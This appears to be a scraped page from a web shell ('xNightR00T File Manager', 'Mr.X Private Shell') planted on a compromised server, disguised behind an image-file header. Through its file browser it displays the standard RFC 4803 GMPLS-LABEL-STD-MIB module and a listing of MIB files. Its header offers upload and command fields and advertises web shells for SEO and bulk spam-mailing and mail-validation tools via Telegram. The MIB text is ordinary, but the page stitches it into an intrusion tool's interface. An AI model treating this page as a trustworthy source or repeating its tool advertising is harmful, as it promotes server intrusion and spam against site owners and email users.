xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
GMPLS-LABEL-STD-MIB DEFINITIONS ::= BEGIN

IMPORTS
  MODULE-IDENTITY, OBJECT-TYPE, Unsigned32, Integer32
    FROM SNMPv2-SMI                                   -- RFC 2578
  MODULE-COMPLIANCE, OBJECT-GROUP
    FROM SNMPv2-CONF                                  -- RFC 2580
  RowStatus, StorageType
    FROM SNMPv2-TC                                    -- RFC 2579
  InterfaceIndexOrZero
    FROM IF-MIB                                       -- RFC 2863
  IndexIntegerNextFree
    FROM DIFFSERV-MIB                                 -- RFC 3289
  MplsLabel, mplsStdMIB
    FROM MPLS-TC-STD-MIB                              -- RFC 3811
  GmplsLabelTypeTC, GmplsFreeformLabelTC
    FROM GMPLS-TC-STD-MIB                             -- RFC 4801
;

gmplsLabelStdMIB MODULE-IDENTITY
  LAST-UPDATED
    "200702270000Z" -- 27 February 2007 00:00:00 GMT
  ORGANIZATION
    "IETF Common Control and Measurement Plane (CCAMP) Working Group"
  CONTACT-INFO
    "       Thomas D. Nadeau
            Cisco Systems, Inc.
     Email: tnadeau@cisco.com

            Adrian Farrel
            Old Dog Consulting
     Email: adrian@olddog.co.uk

     Comments about this document should be emailed directly to the
     CCAMP working group mailing list at ccamp@ops.ietf.org."

  DESCRIPTION
    "Copyright (C) The IETF Trust (2007).  This version of
     this MIB module is part of RFC 4803; see the RFC itself for
     full legal notices.




     This MIB module contains managed object definitions for labels
     within GMPLS systems as defined in
     Generalized Multi-Protocol Label Switching (GMPLS) Signaling
     Functional Description, Berger, L. (Editor), RFC 3471,
     January 2003."
  REVISION
    "200702270000Z" -- 27 February 2007 00:00:00 GMT
  DESCRIPTION
    "Initial version issued as part of RFC 4803."
  ::= { mplsStdMIB 16 }

-- no notifications are currently defined.

gmplsLabelObjects        OBJECT IDENTIFIER ::= { gmplsLabelStdMIB 1 }
gmplsLabelConformance    OBJECT IDENTIFIER ::= { gmplsLabelStdMIB 2 }

gmplsLabelIndexNext OBJECT-TYPE
  SYNTAX        IndexIntegerNextFree
  MAX-ACCESS    read-only
  STATUS        current
  DESCRIPTION
      "This object contains an unused value for gmplsLabelIndex,
       or a zero to indicate that no unused value exists or is
       available.

       A management application wishing to create a row in the
       gmplsLabelTable may read this object and then attempt to
       create a row in the table.  If row creation fails (because
       another application has already created a row with the
       supplied index), the management application should read this
       object again to get a new index value.

       When a row is created in the gmplsLabelTable with the
       gmplsLabelIndex value held by this object, an implementation
       MUST change the value in this object."
  ::= { gmplsLabelObjects 1 }

gmplsLabelTable OBJECT-TYPE
  SYNTAX        SEQUENCE OF GmplsLabelEntry
  MAX-ACCESS    not-accessible
  STATUS        current
  DESCRIPTION
    "Table of GMPLS Labels.  This table allows the representation
     of the more complex label forms required for GMPLS that cannot
     be held within the TEXTUAL-CONVENTION MplsLabel; that is, labels
     that cannot be encoded within 32 bits.  It is, nevertheless, also
     capable of holding 32-bit labels or regular MPLS Labels if
     desired.


     Each entry in this table represents an individual GMPLS Label
     value.  The representation of Labels in tables in other MIB
     modules may be achieved by a referrence to an entry in this
     table by means of a row pointer into this table.  The indexing
     of this table provides for arbitrary indexing and also for
     concatenation of labels.

     For an example of label concatenation, see RFC 3945, section 7.1.
     In essence, a GMPLS Label may be composite in order to identify
     a set of resources in the data plane.  Practical examples are
     timeslots and wavelength sets (which are not contiguous like
     wavebands).

     The indexing mechanism allows multiple entries in this table to
     be seen as a sequence of labels that should be concatenated.
     Ordering is potentially very sensitive for concatenation."
   REFERENCE
     "1. Generalized Multiprotocol Label Switching (GMPLS)
         Architecture, RFC 3945, section 7.1."
::= { gmplsLabelObjects 2 }

gmplsLabelEntry OBJECT-TYPE
  SYNTAX        GmplsLabelEntry
  MAX-ACCESS    not-accessible
  STATUS        current
  DESCRIPTION
    "An entry in this table represents a single label value.  There
     are three indexes into the table.

     -  The interface index may be helpful to distinguish which
        labels are in use on which interfaces or to handle cases
        where there are a very large number of labels in use in the
        system.  When label representation is desired to apply to the
        whole system or when it is not important to distinguish
        labels by their interfaces, this index MAY be set to zero.

     -  The label index provides a way of identifying the label.

     -  The label sub-index is only used for concatenated labels.  It
        identifies each component label.  When non-concatenated labels
        are used, this index SHOULD be set to zero.

     A storage type object is supplied to control the storage type
     for each entry, but implementations should note that the storage
     type of conceptual rows in other tables that include row
     pointers to an entry in this table SHOULD dictate the storage
     type of the rows in this table where the row in the other table
     is more persistent."


  INDEX {
    gmplsLabelInterface,
    gmplsLabelIndex,
    gmplsLabelSubindex }
::= { gmplsLabelTable 1 }

GmplsLabelEntry ::= SEQUENCE {
  gmplsLabelInterface           InterfaceIndexOrZero,
  gmplsLabelIndex               Unsigned32,
  gmplsLabelSubindex            Unsigned32,
  gmplsLabelType                GmplsLabelTypeTC,
  gmplsLabelMplsLabel           MplsLabel,
  gmplsLabelPortWavelength      Unsigned32,
  gmplsLabelFreeform            GmplsFreeformLabelTC,
  gmplsLabelSonetSdhSignalIndex Integer32,
  gmplsLabelSdhVc               Integer32,
  gmplsLabelSdhVcBranch         Integer32,
  gmplsLabelSonetSdhBranch      Integer32,
  gmplsLabelSonetSdhGroupBranch Integer32,
  gmplsLabelWavebandId          Unsigned32,
  gmplsLabelWavebandStart       Unsigned32,
  gmplsLabelWavebandEnd         Unsigned32,
  gmplsLabelStorageType         StorageType,
  gmplsLabelRowStatus           RowStatus
}

gmplsLabelInterface OBJECT-TYPE
  SYNTAX        InterfaceIndexOrZero
  MAX-ACCESS    not-accessible
  STATUS        current
  DESCRIPTION
    "The interface on which this label is used.  If this object is set
     to zero, the label MUST have applicability across the
     whole system and not be limited to a single interface."
::= { gmplsLabelEntry 1 }

gmplsLabelIndex OBJECT-TYPE
  SYNTAX        Unsigned32 (0..4294967295)
  MAX-ACCESS    not-accessible
  STATUS        current
  DESCRIPTION
    "An arbitrary index into the table to identify a label.

     Note that implementations that are representing 32-bit labels
     within this table MAY choose to align this index with the value
     of the label, and this may result in the use of the value zero
     since it represents a valid label value.  Such implementation
     should be aware of the implications of sparsely populated


     tables.

     A management application may read the gmplsLabelIndexNext
     object to find a suitable value for this object."
::= { gmplsLabelEntry 2 }

gmplsLabelSubindex OBJECT-TYPE
  SYNTAX        Unsigned32 (0..4294967295)
  MAX-ACCESS    not-accessible
  STATUS        current
  DESCRIPTION
    "In conjunction with gmplsLabelInterface and gmplsLabelIndex,
     this object uniquely identifies this row.  This sub-index allows
     a single GMPLS Label to be defined as a concatenation of labels.
     This is particularly useful in TDM.

     The ordering of sub-labels is strict with the sub-label with
     the lowest gmplsLabelSubindex appearing first.  Note that all
     sub-labels of a single GMPLS Label must share the same
     gmplsLabelInterface and gmplsLabelIndex values.  For labels that
     are not composed of concatenated sub-labels, this value SHOULD
     be set to zero."
::= { gmplsLabelEntry 3 }

gmplsLabelType OBJECT-TYPE
  SYNTAX        GmplsLabelTypeTC
  MAX-ACCESS    read-create
  STATUS        current
  DESCRIPTION
    "Identifies the type of this label.  Note that this object does
     not determine whether MPLS or GMPLS signaling is in use: a value
     of gmplsMplsLabel(1) denotes that an MPLS Packet Label is
     present in the gmplsLabelMplsLabel object and encoded using the
     MplsLabel TEXTUAL-CONVENTION (may be a 20-bit MPLS Label, a 10-
     or 23-bit Frame Relay Label, or an Asynchronous Transfer Mode
     (ATM) Label), but does not describe whether this is signaled
     using MPLS or GMPLS.

     The value of this object helps determine which of the following
     objects are valid.  This object cannot be modified if
     gmplsLabelRowStatus is active(1)."
   REFERENCE
     "1. Generalized Multi-Protocol Label Switching (GMPLS) Signaling
         Functional Description, RFC 3471, section 3."
::= { gmplsLabelEntry 4 }

gmplsLabelMplsLabel OBJECT-TYPE
  SYNTAX         MplsLabel


  MAX-ACCESS     read-create
  STATUS         current
  DESCRIPTION
    "The value of an MPLS Label (that is a Packet Label) if this
     table is used to store it.  This may be used in MPLS systems even
     though the label values can be adequately stored in the MPLS MIB
     modules (MPLS-LSR-STD-MIB and MPLS-TE-STD-MIB).  Furthermore, in
     mixed MPLS and GMPLS systems, it may be advantageous to store all
     labels in a single label table.  Lastly, in GMPLS systems where
     Packet Labels are used (that is in systems that use GMPLS
     signaling and GMPLS Labels for packet switching), it may be
     desirable to use this table.

     This object is only valid if gmplsLabelType is set
     to gmplsMplsLabel(1).  This object cannot be modified if
     gmplsLabelRowStatus is active(1)."
  REFERENCE
    "1. MPLS Label Stack Encoding, RFC 3032."
  DEFVAL { 0 }
::= { gmplsLabelEntry 5 }

gmplsLabelPortWavelength OBJECT-TYPE
  SYNTAX        Unsigned32
  MAX-ACCESS    read-create
  STATUS        current
  DESCRIPTION
    "The value of a Port or Wavelength Label when carried as a
     Generalized Label.  Only valid if gmplsLabelType is set to
     gmplsPortWavelengthLabel(2).  This object cannot be modified if
     gmplsLabelRowStatus is active(1)."
  REFERENCE
    "1. Generalized Multi-Protocol Label Switching (GMPLS) Signaling
        Functional Description, RFC 3471, section 3.2.1.1."
  DEFVAL { 0 }
::= { gmplsLabelEntry 6 }

gmplsLabelFreeform OBJECT-TYPE
  SYNTAX        GmplsFreeformLabelTC
  MAX-ACCESS    read-create
  STATUS        current
  DESCRIPTION
    "The value of a Freeform Generalized Label that does not conform
     to one of the standardized label encodings or that an
     implementation chooses to represent as an octet string without
     further decoding.  Only valid if gmplsLabelType is set to
     gmplsFreeformLabel(3).  This object cannot be modified
     if gmplsLabelRowStatus is active(1)."
  REFERENCE


    "1. Generalized Multi-Protocol Label Switching (GMPLS) Signaling
        Functional Description, RFC 3471, section 3.2."
  DEFVAL { '00'h }
::= { gmplsLabelEntry 7 }

gmplsLabelSonetSdhSignalIndex OBJECT-TYPE
  SYNTAX        Integer32 (0..4095)
  MAX-ACCESS    read-create
  STATUS        current
  DESCRIPTION
    "The Signal Index value (S) of a SONET or SDH Generalized Label.
     Zero indicates that this field is non-significant.  Only valid if
     gmplsLabelType is set to gmplsSonetLabel(4) or gmplsSdhLabel(5).
     This object cannot be modified if gmplsLabelRowStatus is
     active(1)."
  REFERENCE
    "1. Generalized Multi-Protocol Label Switching (GMPLS) Extensions
        for Synchronous Optical Network (SONET) and Synchronous
        Digital Hierarchy (SDH) Control, RFC 4606, section 3."
  DEFVAL { 0 }
::= { gmplsLabelEntry 8 }

gmplsLabelSdhVc OBJECT-TYPE
  SYNTAX        Integer32 (0..15)
  MAX-ACCESS    read-create
  STATUS        current
  DESCRIPTION
    "The VC Indicator (U) of an SDH Generalized Label.  Zero indicates
     that this field is non-significant.  Only valid if gmplsLabelType
     is set to gmplsSdhLabel(5).  This object cannot be modified if
     gmplsLabelRowStatus is active(1)."
  REFERENCE
    "1. Generalized Multi-Protocol Label Switching (GMPLS) Extensions
        for Synchronous Optical Network (SONET) and Synchronous
        Digital Hierarchy (SDH) Control, RFC 4606, section 3."
  DEFVAL { 0 }
::= { gmplsLabelEntry 9 }

gmplsLabelSdhVcBranch OBJECT-TYPE
  SYNTAX        Integer32 (0..15)
  MAX-ACCESS    read-create
  STATUS        current
  DESCRIPTION
    "The VC Branch Indicator (K) of an SDH Generalized Label.  Zero
     indicates that this field is non-significant.  Only valid if
     gmplsLabelType is set to gmplsSdhLabel(5).  This
     object cannot be modified if gmplsLabelRowStatus is active(1)."
  REFERENCE



    "1. Generalized Multi-Protocol Label Switching (GMPLS) Extensions
        for Synchronous Optical Network (SONET) and Synchronous
        Digital Hierarchy (SDH) Control, RFC 4606, section 3."
  DEFVAL { 0 }
::= { gmplsLabelEntry 10 }

gmplsLabelSonetSdhBranch OBJECT-TYPE
  SYNTAX        Integer32 (0..15)
  MAX-ACCESS    read-create
  STATUS        current
  DESCRIPTION
    "The Branch Indicator (L) of a SONET or SDH Generalized Label.
     Zero indicates that this field is non-significant.  Only valid
     gmplsLabelType is set to gmplsSonetLabel(4) or
     gmplsSdhLabel(5).  This object cannot be modified if
     gmplsLabelRowStatus is active(1)."
  REFERENCE
    "1. Generalized Multi-Protocol Label Switching (GMPLS) Extensions
        for Synchronous Optical Network (SONET) and Synchronous
        Digital Hierarchy (SDH) Control, RFC 4606, section 3."
  DEFVAL { 0 }
::= { gmplsLabelEntry 11 }

gmplsLabelSonetSdhGroupBranch OBJECT-TYPE
  SYNTAX        Integer32 (0..15)
  MAX-ACCESS    read-create
  STATUS        current
  DESCRIPTION
    "The Group Branch Indicator (M) of a SONET or SDH Generalized
     Label.  Zero indicates that this field is non-significant.
     Only valid if gmplsLabelType is set to gmplsSonetLabel(4) or
     gmplsSdhLabel(5).  This object cannot be modified if
     gmplsLabelRowStatus is active(1)."
  REFERENCE
    "1. Generalized Multi-Protocol Label Switching (GMPLS) Extensions
        for Synchronous Optical Network (SONET) and Synchronous
        Digital Hierarchy (SDH) Control, RFC 4606, section 3."
  DEFVAL { 0 }
::= { gmplsLabelEntry 12 }

gmplsLabelWavebandId OBJECT-TYPE
  SYNTAX        Unsigned32
  MAX-ACCESS    read-create
  STATUS        current
  DESCRIPTION
    "The waveband identifier component of a Waveband Label.  Only
     valid if gmplsLabelType is set to gmplsWavebandLabel(6).  This
     object cannot be modified if gmplsLabelRowStatus is active(1)."


  REFERENCE
    "1. Generalized Multi-Protocol Label Switching (GMPLS) Signaling
        Functional Description, RFC 3471, section 3.3."
  DEFVAL { 0 }
::= { gmplsLabelEntry 13 }

gmplsLabelWavebandStart OBJECT-TYPE
  SYNTAX        Unsigned32
  MAX-ACCESS    read-create
  STATUS        current
  DESCRIPTION
    "The starting label component of a Waveband Label.  Only valid if
     gmplsLabelType is set to gmplsWavebandLabel(6).  This object
     cannot be modified if gmplsLabelRowStatus is active(1)."
  REFERENCE
    "1. Generalized Multi-Protocol Label Switching (GMPLS) Signaling
        Functional Description, RFC 3471, section 3.3."
  DEFVAL { 0 }
::= { gmplsLabelEntry 14 }

gmplsLabelWavebandEnd OBJECT-TYPE
  SYNTAX        Unsigned32
  MAX-ACCESS    read-create
  STATUS        current
  DESCRIPTION
    "The end label component of a Waveband Label.  Only valid if
     gmplsLabelType is set to gmplsWavebandLabel(6).  This object
     cannot be modified if gmplsLabelRowStatus is active(1)."
  REFERENCE
    "1. Generalized Multi-Protocol Label Switching (GMPLS) Signaling
        Functional Description, RFC 3471, section 3.3."
  DEFVAL { 0 }
::= { gmplsLabelEntry 15 }

gmplsLabelStorageType OBJECT-TYPE
  SYNTAX        StorageType
  MAX-ACCESS    read-create
  STATUS        current
  DESCRIPTION
    "This variable indicates the storage type for this row.  The
     agent MUST ensure that this object's value remains consistent
     with the storage type of any rows in other tables that contain
     pointers to this row.  In particular, the storage type of this
     row must be at least as permanent as that of any row that points
     to it.
     Conceptual rows having the value 'permanent' need not
     allow write-access to any columnar objects in the row."
  REFERENCE


    "1. Textual Conventions for SMIv2, STD 58, RFC 2579, section 2."
  DEFVAL { volatile }
::= { gmplsLabelEntry 16 }

gmplsLabelRowStatus OBJECT-TYPE
  SYNTAX        RowStatus
  MAX-ACCESS    read-create
  STATUS        current
  DESCRIPTION
    "This variable is used to create, modify, and/or delete a row in
     this table.  When a row in this table has a row in the active(1)
     state, no objects in this row can be modified except the
     gmplsLabelRowStatus and gmplsLabelStorageType.

     The gmplsLabelType object does not have a default and must be
     set before a row can become active.  The corresponding label
     objects (dependent on the value of gmplsLabelType) should also
     be set unless they happen to need to use the specified default
     values as follows:

     gmplsLabelType setting             objects to be set
     --------------------------------------------------------------
     gmplsMplsLabel(1)                  gmplsLabelMplsLabel

     gmplsPortWavelengthLabel(2)        gmplsLabelPortWavelength

     gmplsFreeformLabel(3)              gmplsLabelFreeform

     gmplsSonetLabel(4)                 gmplsLabelSonetSdhSignalIndex
                                        gmplsLabelSdhVc
                                        gmplsLabelSdhVcBranch
                                        gmplsLabelSonetSdhBranch
                                        gmplsLabelSonetSdhGroupBranch

     gmplsSdhLabel(5)                   gmplsLabelSonetSdhSignalIndex
                                        gmplsLabelSdhVc
                                        gmplsLabelSdhVcBranch
                                        gmplsLabelSonetSdhBranch
                                        gmplsLabelSonetSdhGroupBranch

     gmplsWavebandLabel(6)              gmplsLabelWavebandId
                                        gmplsLabelWavebandStart
                                        gmplsLabelWavebandEnd"
::= { gmplsLabelEntry 17 }

gmplsLabelGroups
  OBJECT IDENTIFIER ::= { gmplsLabelConformance 1 }



gmplsLabelCompliances
  OBJECT IDENTIFIER ::= { gmplsLabelConformance 2 }

gmplsLabelModuleReadOnlyCompliance MODULE-COMPLIANCE
  STATUS current
  DESCRIPTION
    "Compliance requirement for implementations that only provide
     read-only support for GMPLS-LABEL-STD-MIB.  Such devices can then
     be monitored but cannot be configured using this MIB module."

  MODULE -- this module

  -- The mandatory groups have to be implemented by LSRs claiming
  -- support for this MIB module.  This MIB module is, however, not
  -- mandatory for a working implementation of a GMPLS LSR with full
  -- MIB support if the GMPLS Labels in use can be represented within
  -- a 32-bit quantity.

  MANDATORY-GROUPS {
    gmplsLabelTableGroup
  }

  GROUP gmplsLabelPacketGroup
  DESCRIPTION
    "This group extends gmplsLabelTableGroup for implementations that
     support Packet Labels.  It is optional for implementations that
     do not support Packet Labels."

  GROUP gmplsLabelPortWavelengthGroup
  DESCRIPTION
    "This group extends gmplsLabelTableGroup for implementations that
     support Port and Wavelength Labels.  It is optional for
     implementations that do not support Wavelength Labels."

  GROUP gmplsLabelFreeformGroup
  DESCRIPTION
    "This group extends gmplsLabelTableGroup for implementations that
     support Freeform Labels.  It is optional for implementations that
     do not support Freeform Labels."

  GROUP gmplsLabelSonetSdhGroup
  DESCRIPTION
    "This group extends gmplsLabelTableGroup for implementations that
     support SONET or SDH Labels.  It is optional for implementations
     that do not support SONET or SDH Labels."

  GROUP gmplsLabelWavebandGroup
  DESCRIPTION



    "This group extends gmplsLabelTableGroup for implementations that
     support Waveband Labels.  It is optional for implementations that
     do not support Waveband Labels."
  OBJECT      gmplsLabelType
  MIN-ACCESS  read-only
  DESCRIPTION
    "Write access is not required."

  OBJECT      gmplsLabelMplsLabel
  MIN-ACCESS  read-only
  DESCRIPTION
    "Write access is not required."

  OBJECT      gmplsLabelPortWavelength
  MIN-ACCESS  read-only
  DESCRIPTION
    "Write access is not required."

  OBJECT      gmplsLabelFreeform
  MIN-ACCESS  read-only
  DESCRIPTION
    "Write access is not required."

  OBJECT      gmplsLabelSonetSdhSignalIndex
  MIN-ACCESS  read-only
  DESCRIPTION
    "Write access is not required."

  OBJECT      gmplsLabelSdhVc
  MIN-ACCESS  read-only
  DESCRIPTION
    "Write access is not required."

  OBJECT      gmplsLabelSdhVcBranch
  MIN-ACCESS  read-only
  DESCRIPTION
    "Write access is not required."

  OBJECT      gmplsLabelSonetSdhBranch
  MIN-ACCESS  read-only
  DESCRIPTION
    "Write access is not required."

  OBJECT      gmplsLabelSonetSdhGroupBranch
  MIN-ACCESS  read-only
  DESCRIPTION
    "Write access is not required."




  OBJECT      gmplsLabelWavebandId
  MIN-ACCESS  read-only
  DESCRIPTION
    "Write access is not required."
  OBJECT      gmplsLabelWavebandStart
  MIN-ACCESS  read-only
  DESCRIPTION
    "Write access is not required."

  OBJECT      gmplsLabelWavebandEnd
  MIN-ACCESS  read-only
  DESCRIPTION
    "Write access is not required."

  OBJECT      gmplsLabelStorageType
  MIN-ACCESS  read-only
  DESCRIPTION
    "Write access is not required."

  OBJECT       gmplsLabelRowStatus
  SYNTAX       RowStatus { active(1) }
  MIN-ACCESS   read-only
  DESCRIPTION
    "Write access is not required, and active(1) is
     the only status that needs to be supported."

::= { gmplsLabelCompliances 1 }

gmplsLabelModuleFullCompliance MODULE-COMPLIANCE
  STATUS current
  DESCRIPTION
    "Compliance statement for agents that support the complete
     GMPLS-LABEL-STD-MIB module.

     The mandatory groups have to be implemented by GMPLS LSRs
     claiming support for this MIB module.  This MIB module is,
     however, not mandatory for a working implementation of a GMPLS
     LSR with full MIB support if the GMPLS Labels in use can be
     represented within a 32-bit quantity."

  MODULE -- this module

  MANDATORY-GROUPS {
    gmplsLabelTableGroup
  }

::= { gmplsLabelCompliances 2 }




gmplsLabelTableGroup OBJECT-GROUP
  OBJECTS {
    gmplsLabelIndexNext,
    gmplsLabelType,
    gmplsLabelStorageType,
    gmplsLabelRowStatus
  }

  STATUS  current
  DESCRIPTION
    "Necessary, but not sufficient, set of objects to implement label
     table support.  In addition, depending on the type of labels
     supported, the following other groups defined below are
     mandatory:

       gmplsLabelWavebandGroup and/or
       gmplsLabelPacketGroup and/or
       gmplsLabelPortWavelengthGroup and/or
       gmplsLabelFreeformGroup and/or
       gmplsLabelSonetSdhGroup."
::= { gmplsLabelGroups 1 }

gmplsLabelPacketGroup OBJECT-GROUP
  OBJECTS {
    gmplsLabelMplsLabel
  }
  STATUS  current
  DESCRIPTION
    "Object needed to implement Packet (MPLS) Labels."
::= { gmplsLabelGroups 2 }

gmplsLabelPortWavelengthGroup OBJECT-GROUP
  OBJECTS {
    gmplsLabelPortWavelength
  }
  STATUS  current
  DESCRIPTION
    "Object needed to implement Port and Wavelength Labels."
::= { gmplsLabelGroups 3 }

gmplsLabelFreeformGroup OBJECT-GROUP
  OBJECTS {
    gmplsLabelFreeform
  }
  STATUS  current
  DESCRIPTION
    "Object needed to implement Freeform Labels."
::= { gmplsLabelGroups 4 }



gmplsLabelSonetSdhGroup OBJECT-GROUP
  OBJECTS {
    gmplsLabelSonetSdhSignalIndex,
    gmplsLabelSdhVc,
    gmplsLabelSdhVcBranch,
    gmplsLabelSonetSdhBranch,
    gmplsLabelSonetSdhGroupBranch
  }
  STATUS  current
  DESCRIPTION
    "Objects needed to implement SONET and SDH Labels."
::= { gmplsLabelGroups 5 }

gmplsLabelWavebandGroup OBJECT-GROUP
  OBJECTS {
    gmplsLabelWavebandId,
    gmplsLabelWavebandStart,
    gmplsLabelWavebandEnd
  }
  STATUS  current
  DESCRIPTION
    "Objects needed to implement Waveband Labels."
::= { gmplsLabelGroups 6 }

END

Filemanager

Name Type Size Permission Actions
ACCOUNTING-CONTROL-MIB File 30.35 KB 0644
ADSL-LINE-EXT-MIB File 47.79 KB 0644
ADSL-LINE-MIB File 166.6 KB 0644
ADSL-TC-MIB File 3.84 KB 0644
ADSL2-LINE-MIB File 200.92 KB 0644
ADSL2-LINE-TC-MIB File 27.4 KB 0644
AGENTX-MIB File 17.07 KB 0644
AGGREGATE-MIB File 16.57 KB 0644
ALARM-MIB File 37.66 KB 0644
APM-MIB File 84.29 KB 0644
APPC-MIB File 195.31 KB 0644
APPLETALK-MIB File 100.13 KB 0644
APPLICATION-MIB File 117.42 KB 0644
APPN-DLUR-MIB File 23.15 KB 0644
APPN-MIB File 195.6 KB 0644
APPN-TRAP-MIB File 20.13 KB 0644
APS-MIB File 55.47 KB 0644
ARC-MIB File 13.73 KB 0644
ATM-ACCOUNTING-INFORMATION-MIB File 14.81 KB 0644
ATM-MIB File 102.21 KB 0644
ATM-TC-MIB File 26.64 KB 0644
ATM2-MIB File 116.56 KB 0644
BGP4-MIB File 43.04 KB 0644
BLDG-HVAC-MIB File 21.54 KB 0644
BRIDGE-MIB File 49.84 KB 0644
CHARACTER-MIB File 20.47 KB 0644
CIRCUIT-IF-MIB File 12.96 KB 0644
CLNS-MIB File 36.38 KB 0644
COFFEE-POT-MIB File 3.58 KB 0644
COPS-CLIENT-MIB File 31.18 KB 0644
DECNET-PHIV-MIB File 92.46 KB 0644
DIAL-CONTROL-MIB File 46.43 KB 0644
DIFFSERV-CONFIG-MIB File 8.33 KB 0644
DIFFSERV-DSCP-TC File 1.82 KB 0644
DIFFSERV-MIB File 124.5 KB 0644
DIRECTORY-SERVER-MIB File 22.96 KB 0644
DISMAN-EVENT-MIB File 66.58 KB 0644
DISMAN-EXPRESSION-MIB File 41.71 KB 0644
DISMAN-NSLOOKUP-MIB File 18.12 KB 0644
DISMAN-PING-MIB File 56.06 KB 0644
DISMAN-SCHEDULE-MIB File 24.06 KB 0644
DISMAN-SCRIPT-MIB File 62.86 KB 0644
DISMAN-TRACEROUTE-MIB File 67.98 KB 0644
DLSW-MIB File 127.11 KB 0644
DNS-RESOLVER-MIB File 38.41 KB 0644
DNS-SERVER-MIB File 36.64 KB 0644
DOCS-BPI-MIB File 56.43 KB 0644
DOCS-CABLE-DEVICE-MIB File 117.75 KB 0644
DOCS-IETF-BPI2-MIB File 132.2 KB 0644
DOCS-IETF-CABLE-DEVICE-NOTIFICATION-MIB File 54.17 KB 0644
DOCS-IETF-QOS-MIB File 126.86 KB 0644
DOCS-IETF-SUBMGT-MIB File 23.74 KB 0644
DOCS-IF-MIB File 204.1 KB 0644
DOT12-IF-MIB File 31.21 KB 0644
DOT12-RPTR-MIB File 81.56 KB 0644
DOT3-EPON-MIB File 111.24 KB 0644
DOT3-OAM-MIB File 83.82 KB 0644
DS0-MIB File 9.46 KB 0644
DS0BUNDLE-MIB File 9.76 KB 0644
DS1-MIB File 100.45 KB 0644
DS3-MIB File 60.82 KB 0644
DSA-MIB File 21.85 KB 0644
DSMON-MIB File 170.73 KB 0644
EBN-MIB File 25.69 KB 0644
EFM-CU-MIB File 110.78 KB 0644
ENTITY-MIB File 57.84 KB 0644
ENTITY-SENSOR-MIB File 15.8 KB 0644
ENTITY-STATE-MIB File 11.97 KB 0644
ENTITY-STATE-TC-MIB File 6.17 KB 0644
ETHER-CHIPSET-MIB File 20.81 KB 0644
ETHER-WIS File 21.22 KB 0644
EtherLike-MIB File 82.6 KB 0644
FC-MGMT-MIB File 73.67 KB 0644
FCIP-MGMT-MIB File 33.81 KB 0644
FDDI-SMT73-MIB File 66.52 KB 0644
FIBRE-CHANNEL-FE-MIB File 57.74 KB 0644
FLOW-METER-MIB File 64.47 KB 0644
FR-ATM-PVC-SERVICE-IWF-MIB File 46.18 KB 0644
FR-MFR-MIB File 29.42 KB 0644
FRAME-RELAY-DTE-MIB File 32.23 KB 0644
FRNETSERV-MIB File 103.63 KB 0644
FRSLD-MIB File 64.54 KB 0644
Finisher-MIB File 32.35 KB 0644
GMPLS-LABEL-STD-MIB File 24.36 KB 0644
GMPLS-LSR-STD-MIB File 16.83 KB 0644
GMPLS-TC-STD-MIB File 4.78 KB 0644
GMPLS-TE-STD-MIB File 60.73 KB 0644
GSMP-MIB File 59.6 KB 0644
HC-ALARM-MIB File 27.52 KB 0644
HC-PerfHist-TC-MIB File 9.49 KB 0644
HC-RMON-MIB File 115.83 KB 0644
HCNUM-TC File 4.55 KB 0644
HDSL2-SHDSL-LINE-MIB File 83.59 KB 0644
HOST-RESOURCES-MIB File 51.31 KB 0644
HOST-RESOURCES-TYPES File 10.33 KB 0644
HPR-IP-MIB File 17.76 KB 0644
HPR-MIB File 46.24 KB 0644
IANA-ITU-ALARM-TC-MIB File 12.71 KB 0644
IF-CAP-STACK-MIB File 9.89 KB 0644
IF-INVERTED-STACK-MIB File 4.96 KB 0644
IF-MIB File 70.09 KB 0644
IFCP-MGMT-MIB File 37.34 KB 0644
IGMP-STD-MIB File 16.96 KB 0644
INET-ADDRESS-MIB File 16.41 KB 0644
INTEGRATED-SERVICES-GUARANTEED-MIB File 8.47 KB 0644
INTEGRATED-SERVICES-MIB File 26.08 KB 0644
INTERFACETOPN-MIB File 38.92 KB 0644
IP-FORWARD-MIB File 45.28 KB 0644
IP-MIB File 181.57 KB 0644
IPATM-IPMC-MIB File 98.52 KB 0644
IPMCAST-MIB File 91.67 KB 0644
IPMROUTE-STD-MIB File 30.46 KB 0644
IPOA-MIB File 53.71 KB 0644
IPS-AUTH-MIB File 39.93 KB 0644
IPSEC-SPD-MIB File 92.46 KB 0644
IPV6-FLOW-LABEL-MIB File 1.99 KB 0644
IPV6-ICMP-MIB File 15.56 KB 0644
IPV6-MIB File 47.56 KB 0644
IPV6-MLD-MIB File 13.35 KB 0644
IPV6-TC File 2.31 KB 0644
IPV6-TCP-MIB File 7.06 KB 0644
IPV6-UDP-MIB File 4.29 KB 0644
ISCSI-MIB File 105.07 KB 0644
ISDN-MIB File 44.62 KB 0644
ISIS-MIB File 142.38 KB 0644
ISNS-MIB File 121.36 KB 0644
ITU-ALARM-MIB File 16.06 KB 0644
ITU-ALARM-TC-MIB File 2.77 KB 0644
Job-Monitoring-MIB File 68.15 KB 0644
L2TP-MIB File 93.94 KB 0644
LANGTAG-TC-MIB File 2.29 KB 0644
LMP-MIB File 107.63 KB 0644
MALLOC-MIB File 46.65 KB 0644
MAU-MIB File 68.95 KB 0644
MIDCOM-MIB File 85.61 KB 0644
MIOX25-MIB File 26.03 KB 0644
MIP-MIB File 73.74 KB 0644
MOBILEIPV6-MIB File 157.67 KB 0644
MPLS-FTN-STD-MIB File 34.89 KB 0644
MPLS-L3VPN-STD-MIB File 58.2 KB 0644
MPLS-LC-ATM-STD-MIB File 10.73 KB 0644
MPLS-LC-FR-STD-MIB File 8.26 KB 0644
MPLS-LDP-ATM-STD-MIB File 25.19 KB 0644
MPLS-LDP-FRAME-RELAY-STD-MIB File 21.63 KB 0644
